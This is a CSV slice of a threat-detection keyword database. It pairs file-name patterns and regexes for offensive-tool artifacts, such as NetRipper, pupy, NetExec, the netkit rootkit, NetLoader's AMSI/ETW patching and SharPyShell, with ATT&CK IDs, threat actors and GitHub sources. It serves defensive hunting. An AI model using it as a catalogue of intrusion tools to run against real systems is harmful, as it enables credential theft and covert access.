"*\nemty_v16.txt*",".{0,1000}\\nemty_v16\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16756"
"*\nemty_v25.txt*",".{0,1000}\\nemty_v25\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16757"
"*\net*\ftpagent.exe*",".{0,1000}\\net.{0,1000}\\ftpagent\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","16758"
"*\net_4.0_32_RunasCs.exe*",".{0,1000}\\net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16763"
"*\net_4.0_32SharpDoor.exe*",".{0,1000}\\net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16764"
"*\net_4.0_32sharpfiles.exe*",".{0,1000}\\net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16765"
"*\net_4.0_64_RunasCs.exe*",".{0,1000}\\net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16766"
"*\net_4.0_64SharpDoor.exe*",".{0,1000}\\net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16767"
"*\net_4.0_64sharpfiles.exe*",".{0,1000}\\net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16768"
"*\net_4.0_Any_RunasCs.exe*",".{0,1000}\\net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16769"
"*\net_4.0_AnySharpDoor.exe*",".{0,1000}\\net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16770"
"*\net_4.0_Anysharpfiles.exe*",".{0,1000}\\net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16771"
"*\net_4.5_32_RunasCs.exe*",".{0,1000}\\net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16772"
"*\net_4.5_32SharpDoor.exe*",".{0,1000}\\net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16773"
"*\net_4.5_32sharpfiles.exe*",".{0,1000}\\net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16774"
"*\net_4.5_64_RunasCs.exe*",".{0,1000}\\net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16775"
"*\net_4.5_64SharpDoor.exe*",".{0,1000}\\net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16776"
"*\net_4.5_64sharpfiles.exe*",".{0,1000}\\net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16777"
"*\net_4.5_Any_RunasCs.exe*",".{0,1000}\\net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16778"
"*\net_4.5_AnySharpDoor.exe*",".{0,1000}\\net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16779"
"*\net_4.5_Anysharpfiles.exe*",".{0,1000}\\net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16780"
"*\net_4.7_32_RunasCs.exe*",".{0,1000}\\net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16781"
"*\net_4.7_64_RunasCs.exe*",".{0,1000}\\net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16782"
"*\net_4.7_Any_RunasCs.exe*",".{0,1000}\\net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16783"
"*\net_portscan.py*",".{0,1000}\\net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16784"
"*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16786"
"*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16787"
"*\NetClone.exe*",".{0,1000}\\NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16789"
"*\NetClone\Program.cs*",".{0,1000}\\NetClone\\Program\.cs.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16790"
"*\netcreds.py*",".{0,1000}\\netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16791"
"*\netexec.py*",".{0,1000}\\netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16792"
"*\netexec.yml*",".{0,1000}\\netexec\.yml.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16793"
"*\NetExec-main\*",".{0,1000}\\NetExec\-main\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16794"
"*\Net-GPPPassword.exe*",".{0,1000}\\Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16795"
"*\netkit\client\shell.py*",".{0,1000}\\netkit\\client\\shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","16796"
"*\netkit\src\netkit.*",".{0,1000}\\netkit\\src\\netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","16797"
"*\NetLoader.exe*",".{0,1000}\\NetLoader\.exe.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","16798"
"*\NetRipper.cpp*",".{0,1000}\\NetRipper\.cpp.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16799"
"*\NetRipper.dll*",".{0,1000}\\NetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16800"
"*\NetRipper.exe*",".{0,1000}\\NetRipper\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16801"
"*\netripper.rb*",".{0,1000}\\netripper\.rb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16802"
"*\NetRipper.sln*",".{0,1000}\\NetRipper\.sln.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16803"
"*\NetRipper.x64.exe*",".{0,1000}\\NetRipper\.x64\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16804"
"*\NetRipper.x64.pdb*",".{0,1000}\\NetRipper\.x64\.pdb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16805"
"*\NetRipper.x86.exe*",".{0,1000}\\NetRipper\.x86\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16806"
"*\NetRipper.x86.pdb*",".{0,1000}\\NetRipper\.x86\.pdb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16807"
